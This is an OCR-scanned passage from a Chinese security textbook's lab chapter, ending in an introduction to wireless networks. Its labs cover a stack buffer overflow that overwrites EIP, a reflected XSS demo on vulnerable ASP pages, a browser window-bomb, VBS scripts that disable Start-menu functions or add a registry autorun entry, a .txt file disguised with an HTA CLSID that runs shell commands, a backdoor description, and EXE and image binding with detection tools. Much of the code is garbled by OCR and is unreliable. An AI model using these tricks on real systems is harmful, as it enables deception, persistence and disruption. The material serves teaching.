【实验 设备 】 

Windows XP 系统 , VMWare 系统 ,Windows 2000/XP 虚拟 机 。 


实践 


【实验 内 容 1] 
编写 简单 的 缓冲 区 溢出 攻击 程序 ,编译 后 分 别 在 实验 主机 和 虚拟 机 中 运行 。 


1. 简单 原理 示例 
VC 环境 下 编译 以 下 代码 。 


# include < stdio. h> 
# include < string.h> 
har name[ ] = "abcdefghijklmnopqrstuvwxyz" ; 
int main() ( 
char buffer[8]; 
strcpy(buffer, name) ; 
return 0; 


) 


运行 编译 后 的 程序 ,系统 会 出 现 如 图 6-2 所 示 的 警告 , 单 击 “ 调 试 ”按钮 ,根据 返回 的 偏 
移 值 可 推断 出 溢出 的 部 位 ,如 图 6-3 所 示 。 


aus. exe 巡 到 问题 需要 关闭 。 我 们 对 此 引起 的 不 便 表示 


如 果 您 正 处 于 进程 当中 ， 信息 有 可 能 役 失 。 

请 将 此 问题 报告 给 Microsoft, 

[mI Men UM uto Ae osten. RIH 
要 查看 这 个 错误 报告 包含 的 数据 MATHA. 

调式 但) mx G | TRE 


图 6-2 运行 程序 后 的 警告 


WRES 
Appllane: examplei exe — AppVer. 0.0.0.0 Nodame: unknown 
ModVer: 0.0.0.0 Offset: TO5f&e6à 


图 6-3 调试 结果 


2. 溢出 攻击 模拟 示例 


实验 需要 使 用 的 工具 包括 OllyDB 和 Uedit。 
COD 编写 一 个 C++ 程序 2. c, 源 码 如 下 。 


# include "iostream. h" 

int main () 

{ 

char name[8]; 

cout ««"Please type your name: "; 
cin>> name; 

cout ««"Hello, "; 

cout<< name; 


cout <<"\n" 

return 0; 

} 

赋值 一 个 名 为 name 的 字符 类 型 数组 (字符 串 ) ,其 内 容 空 间 为 8 个 字 节 ,运行 程序 时 首 
先 提示 使 用 者 输入 名 字 , 输 入 后 将 该 值 赋 给 name, 然 后 以 “Hello, 你 的 名 字 \n” 的 方式 输出 。 
使 用 VC 的 lc 编译 该 程序 (编译 后 的 程序 为 2. exe) 后 运行 ,此 时 车 “你 的 名 字 ” 小 于 或 等 于 8 
个 字 节 时 程序 能 正常 运行 ,否则 将 出 现 如 图 6-4 提示 。 


2. exe 遇 到 问题 需要 关闭 。 我 们 对 此 引起 的 不 便 表 示 抱 攻 - 


加 果 您 正 处 于 进程 当中 ， 信 息 有 可 能 丢失 。 
MRHAR Microsoft 


E c. gane. 您 可 以 将 它 发 送 给 我 们 。 我 各 
要 查看 这 个 博识 报 首 包 售 的 涩 据 ， Matka. 


调试 @@) 发 送 错误 报 省 G) | | CERE UD 


图 6-4 超过 8 个 字 节 时 出 现 的 警告 


(2) 下 面 要 做 的 实验 就 是 让 该 程序 溢出 ,并 能 跳 转 到 程序 的 开头 重新 运行 该 程序 。 运 行 
2. exe, ida iaip siet iei elt dg uM. 
在 弹出 的 对 话 框 中 单 击 “调试 ?按钮 (这 里 用 OllyDB 作为 系统 的 主 调试 器 ) 进 入 OllyDB 调 
试 模式 ,如 图 6-5 所 示 。 

x OllyICE - 2.exe — [CPU — 主线 程 ] 

图 文件 FE) SEO WY dép 选项 GD 一 一 LI 


图 6-5 OIlyDB 调试 模式 


实践 


由 图 6-5 可 知 负责 下 一 跳 的 EIP 寄存 器 的 值 被 覆盖 了 ,其 值 为 66656565, 对 照 ASCII 
表 后 得 到 其 值 为 "feee”, 由 于 寄存 器 特点 ,其实 是 “eeef” 覆 盖 了 EIP, 现 在 可 以 确认 这 个 输入 
的 字符 串 是 从 第 13 个 字 节 开始 覆盖 EIP 的 , 共 4 个 字 节 。 

(3) 用 OllyDB 重新 加 载 2. exe, 如 图 6-6 所 示 。 


m B 
XD SEV WMO MO AD HMO PHV -3x 
Li peo] Tw] pes pep] 轩 四 加 四 回 四 [is | ES 
$ ^| 
ENT iiec |o EP, Esp ECA UCL2FFBD 
Wins |: 6A FE pis n EDX TC526898 ntdn1 .KiFast 
deines |: fà 95724200 [PU] 2006222358 | EF 
090340218A|| :68 Eazasgoo [pusi — 11090784 st massa MS onis 
. l: EAX, FSIOT nun E tr Te 
n si EDI ?C930738 rtdll,7C93073| 
eS, [rm onsoanno] > 
ESI c 
ES 


3 
, EP . 3 
NEAR DAMKRNEL32.GetWersiom] | kernel32.Getversion 1 
[AZAACE], EAX 

EAX, [42AAC 相 
EAX, a 


ECX, OFF 
[421900], ECX 
EDX，[42zAxDo] 


pace], EAX 
Lomo [ 


^| 
S HEZE arre TT 
E nasci Eis 


图 6-6 重新 加 载 2. exe 


可 以 看 到 该 程序 起 始 地 址 为 004041B0 ,根据 字符 与 地 址 的 对 照 关系 是 “倒转 ”的 原理 ， 
00 40 41 BO 等 于 BO 41 40 00, 

(4) 打开 UltraEdit, 输 入 1, 然 后 按 Ctrl - H 键 切换 到 HEX. 显示 模式 ,在 HEX 输出 界 
面 中 输入 B0414000, 如 图 6-7 所 示 。 


px «c Wig IQ LC SED AL ZO erg HOV FMY — s 8x 


| tud 


**üccH sua zn Z @ z S mem vwzzu245*454B8n1*90€ 


图 6-7 输入 B0414000 


(5) fi Ctrl 十 H 键 切换 回 原来 的 输入 模式 ,就 可 以 得 到 相应 的 字符 ,如 图 6-8 所 示 。 
(6) # Ctrl 十 A 键 选中 该 输出 的 字符 串 , 将 其 放 在 第 12 个 字 节 之 后 ,如 “aaabbbcccddd 
35)" , HE UR 2] 2. exe, 提 示 输 入 字符 串 时 输入 该 段 字 符 串 ,如 图 6-9 所 示 。 
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€ UltraBdit-32 — [&fx3«] 


xc) RED VEO IE) WEG) LV NU EW BEW FOW HHW -Ax 
x diii 
4 LESH 59A 目 可 ü @ à `, | sfenum ~ š 
x Q iiL FAI 20 saui 30 au AD. 1 50 1 SA Lg 
Im | 打开 9*9 1B 
回忆 ProgramFiles ^ 
& 7) radusd 


图 6-8 输入 模式 


\FINDO¥S\system32\cad. eze 一 2.ex 


本 5.1.26081 
081 Microsoft Corp. 


:NDocuments and Settings *z5»cd x 


your 
" your 
your 
type your 


6-9 重新 启动 2. exe 


如 图 6-9 所 示 ,无 论 输 入 多 少 次 都 还 是 “循环 ”, 溢 出 成 功 
【实验 内 容 2] 

实现 跨 站 脚本 攻击 。 

点 网 站 网 页 文件 为 index. asp, 代 码 如 下 


<% @ Language = VBScript %> 

<% If Request. Cookies("userName") <> "" Then 
Dim strRedirectUrl 
StrRedirectUrl = "page2.asp?userName = " 

StrRedirectUrl = strRedirectUrl & Response. Cookies("userName") 

Response. Redirect(strRedirectUrl) 
Else %> 

<HIML> 

< HEAD > 

<TITLE> MyNiceSite. com Home Page </TITLE > 

</HEAD> 

<BODY> 
< H2 > MyNiceSite. com </H2 > 
< FORM method = "post" action 
Enter your MyNiceSite. com username: 
< INPUT type = "text" name = "userName"> 
< INPUT type = "submit" name = "submit" value = "submit"> 
</FORM> 

</BODY> 

</HTML> 

<% End If $> 


page2. asp"> 


实践 


执行 上 述 代码 后 ,调用 page2. asp, 回 显 输入 的 字符 。page2. asp 代码 如 下 。 


<% @ Language = VBScript %> 
<% Dim strUserName 
If Request. QueryString( "userName" )<> "" Then 
strUserName = Request. QueryString( "userName" ) 
Else 
Response.Cookies("userName") = Request. Form( "userName" ) 
strUserName = Request. Forn("userName") 
End If %> 
<HTML> 
< HEAD ></HEAD > 
<BODY> 
<H3 align = "center"» Hello: <% = strUserName %> </H3 > 
</BODY> 
</HTML> 


MyNiceSite.com 


Enter your MyNiceSite. com username; [<SCRIPT>alert C Hello. — submit | 


图 6-10 index, asp 运行 结果 


74 http://localhost/pagezasp- Microsoit iss ERR 
| XEO SMEO SEV RRA IRD Hhh 

| + - > Qd ar a aP raaa 
| htt) [E] http:iiocalhost/page2.asp 


Hello: winnerzhai 


Microsoft Internet ExplorEn Es i 


正在 打开 网 页 hitp:illocalhostipage2. asp... 


图 6-11 提交 后 的 结果 


【问题 6-1】 黑客 利用 跨 站 脚本 攻击 可 以 造成 哪些 危害 ? 
【实验 内 容 3】 
(1) 实现 恶意 脚本 的 网 页 ,交叉 显示 红色 和 黑色 背景 ,代码 存 为 html 文件 ,将 网 页 文件 


JE web 目录 下 ,通过 浏览 器 访问 该 网 页 。 实 现代 码 如 下 。 


<html> 

<body> 

Test 

< script> 
var color = new Array; 
color[1] = "black"; // 设 置 两 种 颜色 
color[2] = "red"; 
for(x-2;x43;x**) 


( 


document. bgColor = color[x]; // 设 置 背 景色 
if(x==2){x=0;} // 造 成 死 循 环 
</script> 
<body> 
</html> 


(2) SEILA DUKESA D PR BA O EKE e — Rh Ea 5 DU EER A S ETA o s AAR 


码 如 下 。 


Jam; 

EAD) 

CIILDPEREGBIER C/TITLE) 

OETA HTIP-EQUIV-"Contemt-Type" CONTENT" text/htnl;CHARSET-bizb 
“(EE 

(BODY nnlnad-^VindewBonh O "> 


(SCRIPT LANGUAGE-" JavaScript") 
function VindovEonb | 
var iCountar = 0 // umay counter 
while (true) 
t 
window, open (http://www. net scapa, com”, " CRASHING" + 3Comter, "wi dt), height=], resizahle-no") 
iCounte rt 
1 
l 


(script? 
EODY> 


HTL.Y 


这 个 示例 主要 针对 TE 浏览 器 ,程序 运行 结果 如 图 6-12 所 示 。 
单 击 “ 网 页 炸弹 演示 ”的 链接 ,出 现 的 窗口 会 越 来 越 多 。 制 止 的 方法 只 有 一 个 ,就 是 按 热 


启动 组 合 键 Ctrl+Alt+Delete 进入 安全 对 话 框 ,迅速 打开 任务 管理 器 并 中 止 “ 网 页 炸弹 . htm" 
窗口 的 运行 。 


在 遭受 窗口 复 炸 时 ,很 容易 导致 系统 崩溃 ,重新 启动 系统 即 可 。 
(3) 改造 系统 的 “开始 ”菜单 ,编写 禁用 查找 .运行 和 关闭 功能 的 脚本 程序 


图 6-12 网 页 炸弹 演示 


ChangeStartMenu. vbs. 


双击 运行 ,如 果 发 现 “ 开 始 " 菜 单 没 有 变化 , 则 重启 系统 后 好 可 以 看 到 执行 效果 。 
代码 如 下 : 


Sub Change( Argument) 
ChangeStartMenu. RegWrite RegPath&Argument, Key Data, Type Name 
MsgBox( "Success! ") 

End Sub 

Dim ChangeStartMenu 

Set ChangeStartMenu = WScript. CreateObject("WScript. Shell") 

RegPath = "HKCUMSoftwareMMicrosoftMWWindowsVCurrentVersionVPoliciesVExplorerV" 

Type Name - "REG DWORD" 

Key Data- 1 

StartMenu Run = "NoRun" 

StartMenu Find - "NoFind" 

StartMenu Close = "NoClose" 

"Call Change(StartMenu Run) ' 禁 用 "开始 "菜单 中 的 "运行 "功能 

Call Change(StartMenu Find) "禁用 "开始 "菜单 中 的 "查找 "功能 

'Ca11 Change(StartMenu Close) ' 禁 用 "开始 "菜单 中 的 "关闭 系统 "功能 


(4) 向 Windows 中 添加 自 启 动 程序 auto. vbs, 使 得 该 程序 能 在 系统 开机 时 自动 运行 ， 


直接 运行 该 脚本 程序 , 则 系统 启动 之 后 会 自动 运行 cmd 程序 。 代 码 如 下 。 


Dim AutoRunProgram 

Set AutoRunProgram = WScript. CreateObject("WScript. Shell") 
RegPath = "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" 
Type_Name = "REG SZ" 

Key Name = "AutoRun" 

Key Data = "C: WwindowsVsystem32Vcnd. exe " 

"该 自 启动 程序 的 全 路 径 文件 名 

RutoRunProgram. RegWrite RegPath&Key Name, Key Data, Type Name 


' 在 启动 组 中 添加 自 启动 程序 autorun. exe 

MsgBox("Success! ") 

【问题 6-2】 恶意 脚本 构成 安全 威胁 的 根本 原因 是 什么 ? 

(5) 实现 文件 名 欺骗 。 

CD 创建 一 个 文本 文件 ,文件 名 命名 为 test. txt. {3050F4D8-98B5-11CF-BB82- 
00A A00BDCEOB) , 

© 在 该 文件 里 面 添加 如 图 6-13 所 示 的 内 容 。 


Kscript» 

a=new fctiveXübject("USCript.Shell"); 
a.run("ping.exe -t 192.168.1.111"); 
alert("This is a testt"); 

</script> 


图 6-13 诱饵 文件 
O 通过 资源 管理 器 查看 ,会 发 现 它 显示 为 test. txt, WE 6-14 所 示 。 
E] 


| efe) RAO SEV KRA IAD EWH 
| Fme- > - | Qme arr Qe uyal” 


| & etiim (co 
i test 


BELL 

E C7] bodkcapz 
I | (C) Documents and Settings 
| Goos 


hae — (seem 


图 6-14 显示 为 text. txt 


这 是 因为 13050F4D8-98B5-11CF-BB82-00AAO0BDCEOB} 在 注册 表 里 是 htr 文件 关联 
的 CLSID(ClassID) ,用 资源 管理 器 和 IE 浏览 器 查看 时 并 不 会 显现 出 来 ,看 到 的 就 是 . txt X 
件 , 文 件 被 误 认 为 是 一 个 . txt 文件 。 

双击 打开 ,就 会 被 执行 ,如 图 6-15 所 示 。 

在 这 个 例子 中 只 是 启动 了 一 个 命令 行 命令 ping, 并 没有 什么 危害 性 ,如 果 运 行 的 是 格 
式 化 删除 文件 等 破坏 性 命令 ,后 果 就 不 堪 设 想 了 。 

其 实 这 个 文件 在 命令 行 窗口 下 是 可 以 看 见 的 ,如 图 6-16 所 示 。 

这 种 欺骗 的 方法 还 可 以 用 在 邮件 的 附件 中 ,比如 将 一 个 恶意 的 VBS 脚本 伪装 成 文本 文 
件 、 图 片 等 ,再 起 个 吸引 人 的 名 字 引 诱 用 户 去 单 击 , 这 样 就 可 以 直接 对 用 户 进 行 攻击 ,如 删除 
文件 .格式 化 磁盘 ,安装 木马 文件 、 传 播 病 毒 等 。 

在 资源 管理 器 (文件 查看 方式 默认 为 “ 按 Web 页 方式 ”查看 ) 中 ,这 种 带 有 欺骗 性 质 的 
.txt 文件 显示 出 来 的 并 不 是 文本 文件 的 图 标 , 它 显示 的 是 未 定义 文件 类 型 的 图 标 ,这 是 区 
分 它 与 正常 . txt 文件 的 最 好 方法 。 


fron 192.168.1.111: bytez-32 time<lgns ITL-128 
fron 192.168.1.111: bytes-32 time(iUns IIL-128 
fron 192.168.1.111: hytes-32 time<1Bms TTL-128 
fron 192.168. bytes-32 time<10ms ITL-128 
fron 192.168. bytes-32 timeXiUms ITL=128 
fron 192.168. bytes-32 timeX1Uns IIL-128 
fron 122.168. bytes-32 timeXiBns IIL-128 
fron 192.168. bytes-32 timeXiBns ITL-128 
AMETE. Microsort Internet cuplarea] 
fron 192.168. 

fron 192.168. 

fron 192.168. 

fron 192.168. 

fron 192.168. 

fron 192.168 

fron 192.168 bytes-32 TIL-128 
fron 192.168. bytes-32 TIL-128 
fron 192.168.1.111: bytes-32 TIL-128 
fron 192.168.1.111: bytes-32 11L-128 
fron 192.168.1.111: bytes-32 TIL-128 
fron 192.168.1.111: bytes-32 TTL-128 


图 6-15 双击 打开 时 的 效果 


icrosoft Windous 2000 [Version 5.00.2195] 
«c» 版 权 所 有 1985-2000 Microsoft Corp. 


:Wed test 

kwes)die 0 À 
AA E acier 
C:\test 的 目录 


emori 20:59 <DIR> B 


02-12-11 20:59 <DIR> 3 
jpcEaBy 

1 TE 124 + 

2 个 目 1,271,262,328 3 字 节 


je:stest)- 


图 6-16 命令 行 窗口 显示 的 内 容 


另外 ,资源 管理 器 中 在 文件 左面 会 显示 出 其 文件 类 型 ,此 时 可 以 看 到 它 不 是 真正 的 txt 
文件 ,而 是 “HTML Application", 

【实验 内 容 4] 

运行 后 门 程序 。 

后 门 程序 使 用 了 子 进 程 技术 。 服 务 器 打开 子 进程 执行 cmd, 服 务 器 接收 客户 端的 命令 ， 
转交 给 子 进 程 执行 ,并 把 子 进程 执行 的 结果 转交 给 客户 端 。 

在 服务 器 上 执行 后 门 程序 ,例如 在 主机 192. 168. 1. 100 上 执行 后 门 程序 。 再 在 一 个 选 


定 的 客户 机 器 上 执行 telnet 程序 ,“telnet 192. 168. 1. 100 888”, 即 可 以 控制 服务 器 ,在 服务 


器 上 执行 命令 。 


保护 进程 的 后 门 程序 示例 代码 如 下 。 


Dim oShell 
Set oShell = WScript. CreateObject("WScript.Shell") 
If Not CheckPro(".","calc.exe") Then  ' 把 "calc. exe" 换 成 你 想 检查 的 进程 名 
oShell.run "shutdown -s — t 5 -cn"gchr(34)&" 机 器 即将 关闭 "&chr(34) 
End If 
set oshell = nothing 
WScript.quit 
Function CheckPro(strComputer, ProName) 
Dim objWMIService, colProcesses, objProcess 
Set objWMIService = GetObject("winmgmts: VW" & strComputer & "\root\cimv2") 
Set colProcesses - objWMIService.ExecQuery("Select * from Win32 Process") 
CheckPro - False 
For Each objProcess in colProcesses 
If objProcess.Name - ProName Then 
CheckPro - True 
Exit For 
End If 
Next 
End Function 


生生 有 可 执行 程序 捆绑 及 检测 


【实验 目的 】 

OD 了 解 程序 绑 定 的 一 般 方法 。 

(2) 掌握 检测 程序 是 否 有 可 疑 程序 绑 定 的 一 般 方法 。 

【实验 环境 】 

Windows XP/7/8 操作 系统 ,EXE 拥 绑 机 , 拥 绑 文 件 探测 器 。 
【实验 内 容 】 

软件 捆绑 类 型 按照 传统 双 exe 拥 绑 和 图 片 与 程序 的 拥 绑 分 别 介绍 。 


1. 传统 双 EXE 捆绑 


将 B. exe 附加 到 A. exe 的 末尾 , 当 A. exe 被 执行 的 时 候 ,B. exe 也 跟着 执行 。 下 面 以 
EXE 拥 绑 机 为 例 , 介 绍 记事 本 拥 绑 Windows 帮助 文件 的 过 程 。 


CD 指定 两 个 可 执行 文件 ,如 图 6-17、 图 6-18 所 示 。 
(2) 输入 保存 路 径 , 如 图 6-19 所 示 。 
(3) 开始 捆绑 ,如 图 6-20 所 示 。 


(4) 出 现 如 图 6-21 所 示 的 对 话 框 表示 操作 成 功 ,在 输出 路 径 下 找到 新 生成 的 记事 本 文 
件 , 打 开 操作 记事 本 文件 ,同时 帮助 文件 也 被 打开 。 
这 种 简单 的 捆绑 一 般 用 UE 检查 This program 字符 串 的 次 数 就 可 以 检测 出 来 。 一 般 
情况 下 ,干净 的 可 执行 程序 只 会 出 现 一 次 。 


实践 


EXETRÁSUL 


[指定 第 一 个 可 执行 文件 ] 
| kt pi (IXE— T mer i* , MNENE E-t 


第 一 个 可 执行 文件 的 路 径 为 ; 
| \WINDOWS \ROTEFAD. EXE 


《上 一 步 四 | 下 一 步 中 > LZ] 


图 6-17 EXE 捆绑 机 


EXE 捆 绑 机 


[指定 第 二 个 可 执行 文件 ] 
[iesus s 这 是 第 二 个 揪 63 文 件 ， 据 最 后 的 六 件 格 看 不 到 它 的 


第 二 个 可 执行 文件 的 路 径 为 ; 
| WISDOYSAwinhalp. exe 


要 继续 ， 请 点 击 “ 下 一 步 "。 


《上 一 步 @)| 下 一 步 > 取消 


图 6-18 单 击 “ 下 一 步 " 按 钮 


EZE 捆 做 机 


要 继续 ， 请 点 击 “ 下 一 步 ”。 


《上 一 步 @) | 下 一 步 oD > piä 


图 6-19 设置 保存 路 径 


[E: ada] 


EIS ISIATSE ETAT SC HESSE T PST BUT EIE s EERIE. 
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图 6-22 是 木马 辅助 查找 器 检查 的 结果 ,提示 有 捆绑 数据 存在 。 


2. 传统 双 EXE 捆绑 探测 


下 面 以 捆绑 文件 探测 器 为 例 介 绍 捆绑 探测 。 


K — 


图 6-20 捆绑 


EXETBISEUL 


CD 启动 探测 器 ,打开 刚刚 生成 的 拥 绑 文件 ,如 图 6-23 所 示 。 


(2) 单 击 “扫描 文件 ?按钮 ,提示 检测 到 额外 数据 ,如 图 6-24 所 示 。 


图 6-21 捆绑 成 功 


在 这 里 可 以 单 击 * 清 洁 文件 ”按钮 直接 清除 。 


S| 森马 辅助 查找 器 ”2005 For 2000.1P 


[请 信息 | HERE | #288 | B408% | ZEIA | 关于 | 


检验 EXE 文件 是 可 招 贿 数 据 


CR ER [Jem [St] 


计算 EXE 实 际 大 小 为 : 48640 FF 


PR: nno rm WiiuEur 


文件 新 建 /如 除 / 重 命名 Ort OREA 
L]xttXGER/ Bs o 口 文件 大 小 改变 
回 文件 Ge) 峰 改 时 间 发 生 改 变 


LET 


MAC 


TL-WY32IG USB Wireless Adapter ~ 
NVIDIA nForce Networking Control. 
MS TCP Loopback interface 


00-14-78-13-27-07 
00-1F-C6-50-47-9E 
00-00-00-00-00-00 


图 6-22 ”捆绑 数据 存在 


152 temes (Ey 


: 无 忧 捆绑 文件 探测 器 v0. 2 汉化 --- EER) -=: 无 忧 捆绑 文件 探测 委 v0. 2 汉化 --- EOR 
目标 目标 

D: XMHOTEPAD, EXE uns D: MOTEPAD. EXE. 

结果 结果 

迁 择 文件 MOTEPAD.EXE > MENAN. 
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图 6-23 ”打开 捆绑 文件 图 6-24 检测 到 捆绑 
用 户 也 可 以 使 用 附加 数据 提取 器 把 附加 数据 转 存 出 来 供 进一步 处 理 , 如 图 6-25 所 示 。 
BESITZ V1.1 Dy Anskya 3. 图 片 与 软件 的 捆绑 


区 er (1) 准备 一 张 图 片 和 将 要 合并 入 图 片 的 软件 并 存放 
Wade rw De] 在 同一 个 文件 夹 内 
(2) 将 软件 先 压 缩 , 变 成 RAR 文件 (用 WinRAR 添 
加 为 压缩 文件 ) 或 者 ZIP 文件 
(3) 选择 “开始 ”一 运行 ”命令 后 输入 cmd 命令 。 
图 6-25 使 用 附加 数据 提取 器 (4) 在 cmd 对 话 框 中 将 目录 定位 到 存放 图 片 和 软件 
的 位 置 ,假如 1.jpg 和 1. rar 都 存放 在 D: 目 录 下 ,即将 E 


保存 附加 数据 | 退出 程序 
Hines 


录 定 位 到 D. 

5) 定位 到 正确 目录 后 输入 “copy /b( 图 片 名 称 ). jpg 十 (压缩 包 名 称 ). rar (生成 后 图 片 
名 称 ). jpg”, 例 如 将 1. rar 合并 到 1. jpg 中 去 ,就 要 输入 "copy /b 1. jpg 十 1. rar 2. jpg". 40 
图 6-26 所 示 。 所 生成 的 新 的 图 片 文件 就 已 经 包含 了 软件 ， 


-|nix| 


:NDocuments and Settings wpc25d: 


Ycopy /b i.jpg*i.rar 2.jpg 
JPG 


图 6-26 输入 命令 


(6) 将 图 片 传人 相册 存储 , 需 用 时 只 要 下 载 图 片 并 将 拓展 名 改 为 . rar 后 解压 即 可 使 用 。 

此 外 还 可 以 实现 多 文件 捆绑 ,可 以 利用 WinRAR 的 自 解压 拥 绑 、 资 源 包 拥 绑 等 。 资 源 
是 EXE 中 的 一 个 特殊 的 区 段 ,可 以 用 来 包含 EXE 需要 或 不 需要 用 到 的 一 切 东西 。 常 见 的 
木马 生成 器 原理 正 是 基于 此 。 


[3:55 6-4] 清除 DLL 文件 中 的 恶意 功能 


【实验 目的 】 

掌握 通过 修改 DLL 键 值 来 清除 恶意 功能 的 方法 。 

【实验 环境 】 

Windows XP/7/8 操作 系统 。 

【实验 步骤 】 

DLL 文件 是 Windows 的 基础 ,DLL 是 Dynamic Link Library 的 缩写 , 意 为 动态 链接 
库 。 它 不 能 独立 运行 ,一般 都 是 由 进程 加 载 并 调用 的 。 

在 Windows 中 ,许多 应 用 程序 被 分 割 成 一 些 相对 独立 的 动态 链接 库 , 即 DLL 文件 , 放 
置 于 系统 中 。 当 执行 某 一 个 程序 时 ,相应 的 DLL 文件 就 会 被 调用 。 一 个 应 用 程序 可 有 多 个 
DLL 文件 ,一 个 DLL 文件 也 可 能 被 几 个 应 用 程序 所 共用 ,这 样 的 DLL 文件 称 为 共享 DLL 
文件 。DLL 文件 一 般 被 存放 在 "windows\System32” 目 录 下 。 

通过 修改 系统 的 DLL 文件 ,可 以 实现 禁止 删除 文件 ,禁止 IE 下 载 .禁止 IE 另存 为 、 禁 
止 文件 打开 方式 等 功能 。 本 实验 修改 DLL 文件 时 ,只 是 将 所 要 修改 的 键 值 禁 用 ,不 删除 ,以 
备查 看 和 恢复 。 

(OD Fá& DLL 文件 修改 工具 EXESCOPE 6.5 工具 并 安装 。 

(2) 获取 Browselc. dll, Shdoclc. dll, Url. dll, Shell32. dll 和 Cryptui. dll ,并 复制 这 几 个 
文件 到 本 机 实验 目录 。 

(3) 用 EXESCOPE 6. 5 打开 Shdocle. dll, 在 左 侧 窗 格 选择 “4416” 项 ,将 4416 键 值 禁 
用 ,修改 为 “禁止 下 载 ” 

(4) 打开 Shdoclc. dll 在 左 侧 窗 格 选择 *21400” 项 ,将 该 键 值 禁用 ,禁止 网 页 添加 到 收藏 
夹 , 如 图 6-27 所 示 。 

(5) 禁止 恶意 网 页 加 载 控件 ,修改 Cryptui. dll 文件 ,将 130、230、4101、4104、4107 相应 
键 值 统一 修改 为 禁用 。 

(6) 禁止 运行 菜单 ,修改 shell32. dll, 将 1018 键 值 设 置 为 禁用 。 

(7) 禁止 下 文件 夹 选项 ,修改 Browselc. dll 文件, 修改 如 下 3 个 键 值 。 

。 263 一 41251( 删 除 )。 

* 266 一 41329 (删除 )。 

* 268 一 41251 (删除 )。 

个 别 键 值 有 多 处 ,需要 逐一 删除 。 

(8) 禁止 文件 的 打开 方式 ,修改 Url. dll ,将 7000,7005 两 处 键 值 禁 用 。 

(9) 运行 Replacer. exe, 如 图 6-28 所 示 ,依次 把 修改 后 的 DLL 文件 蔡 换 C; NwindowsN 
System32 目录 下 的 对 应 DLL 文件。 


实践 
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图 6-27 EXESCOPE 6.5 工具 的 使 用 


o 安稳 的 符 换 系统 文件 ee 


Gi FEFERON NETEDE. RERSETDIN. 


WWW y (aa; EE PIOS Ec os 14 FG CETTIEORHO BUSHES. 


WESWivors IP. SF 


1、 需 要 被 答 执 的 程序 : 

[CWINDOWS\systemao\shdocle di Cosa. ) 
2. WERTXOOHIESBEI : 

ui Cmm ) 
3. pis: 

"shock: di Guo ) 

C» FRENC) 
图 6-28 替换 文件 


(10) 选择 “开始 ”程式 ”~CMD 命令 进入 DOS 视窗 ,然后 分 别 输入 以 下 命令 。 


rundll32.exe user. exe, restartwindows 

rund1132. exe shell32.dll,Control RunDLL 

请 对 结果 分 别 截图 并 加 以 说 明 。 

【说 明 】 

Rundll32. exe 的 命令 格式 是 rundll32. exe 动态 链接 库 名 函数 名 参数 名 ”。Rundll32. exe 
的 作用 是 执行 DLL 文件 中 的 内 部 函数 。 

【思考 与 练习 】 

如 果 想 汉化 一 个 英文 软件 ,是 否 可 以 用 此 方法 进行 DLL 文件 的 字符 串 蔡 换 呢 ? 
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无 线 网 络 安全 


“无 线 网 络 ” 是 近年 来 非常 热门 的 一 个 名 词 。 从 802. 11b/g 到 
802. 11p, 从 WiMAX 到 4G, 各 种 关于 无 线 网 络 的 讨论 不 绝 于 耳 ,各 个 厂 
家 的 新 产品 和 新 技术 也 充斥 着 人 们 的 眼球 。 


7.1 无 线 网 络 的 类 型 


无 线 网 络 根据 面向 对 象 和 使 用 环境 的 不 同 可 以 分 为 两 大 类 ,一 是 面 
向 语音 的 同步 传输 网 络 , 典 型 代表 是 3G; 二 是 面向 数据 的 异步 传输 网 
络 , 典 型 应 用 是 Wi-Fi, 

3G 是 英文 3rd Generation 的 缩写 , 指 第 三 代 移 动 通信 技术 。 相 对 于 
第 一 代 模 拟 制式 手机 (1G) 和 第 二 代 GSM, TDMA 等 数字 手机 (2G) ,第 
三 代 手 机 一 般 是 指 将 无 线 通信 和 与 国际 互联 网 等 多 媒体 通信 结合 的 新 一 
代 移 动 通信 系统 。 它 能 够 处 理 图 像 .音乐 、 视 频 流 等 多 种 媒体 形式 ,提供 
包括 网 页 浏览 .电话 会 议 . 电 子 商务 等 多 种 信息 服务 。 为 了 提供 这 种 服 
务 ,无 线 网 络 必须 能 够 支持 不 同 的 数据 传输 速度 ,也 就 是 说 ,在 室内 、 室 
外 和 行车 的 环境 中 都 能 够 分 别 支持 至 少 2Mbps( 兆 字 节 每 秒 )、384Kbps 
( 千 字 节 每 秒 ) 以 及 144Kbps 的 传输 速度 。 

Wi-Fi 是 一 种 可 以 将 个 人 电脑 .手持 设备 (如 PDA、 手 机 ) 等 终端 以 
无 线 方 式 互相 连接 的 技术 。 目 的 是 改善 基于 IEEE 802. 11 标准 的 无 线 
网 络 产品 之 间 的 互通 性 ,使 用 IEEE 802. 11 系列 协议 的 无 线 局 域 网 就 称 
为 Wi-Fi。 表 7-1 是 关于 Wi-Fi 的 标准 协议 的 对 比 。 

表 7-1 Wi-Fi 标准 协议 


IEEE 标准 最 高 速率 /Mbps 频带 /GHz 
802.11 2 2.4 
802. 11a 54 5 
802, 11b 11 2.4 
802. 11g 54 2.4 
802. 11n 300 2.4;5 


实践 


7.2. 无 线 网 络 应 用 现状 
7.2.1 无 线 局 域 网 


无 线 局 域 网 可 以 应 用 于 区 域 覆 盖 和 点 对 点 传输 ,其 中 又 以 区 域 覆 羔 应 用 占 绝 大 多 数 。 
按照 应 用 规模 ,国内 的 无 线 局 域 网 大 致 可 以 分 文 以 下 4 种 类 型 。 

CD 个 人 及 家 庭 用 户 : 拥有 多 台 计 算 机 的 家 庭 越 来 越 普 遍 , 此 类 用 户 一 般 会 使 用 集成 
无 线 功能 的 宽带 路 由 器 。 

(2) 企业 用 户 : 这 类 用 户 的 无 线 网 络 大 部 分 由 自己 或 系统 集成 商 搭建 ,网 络 规模 差异 
很 大 ,网 络 的 设计 水 平和 安全 状况 也 参差 不 齐 。 

(3) 热点 应 用 : 近年 来 ,在 咖啡 厅 、 酒 店 、 医 院 、 商 场 、 车 站 等 场所 纷纷 兴起 了 提供 无 线 
上 网 的 服务 ,这些 网 络 仍然 是 由 用 户 自 己 或 系统 集成 商 搭建 的 ,但 是 网 络 的 利用 率 不 高 。 

(4) 大 面积 覆盖 : 为 提升 城市 形象 或 出 于 ISP 之 间 的 竞争 等 目的 ,目前 涌现 了 大 批 机 
Jj Est JG E DX 、 无 线 高 校 甚至 无 线 城市 ,这 类 大 型 网 络 一 般 是 由 各 大 运营 商 进行 部 署 ,从 
设计 到 实施 都 比较 系统 。 


7.2.2 3G 


2011 年 ,全 球 3G 及 以 上 用 户 达 18. 43 亿 , 占 全 球 移动 用 户 的 比例 为 31. 862 ,而且 继 
续 保持 增长 势头 。 相 比 之 下 ,2G 及 以 下 用 户 为 39. 44 亿 , 占 全 球 移动 用 户 的 比例 为 
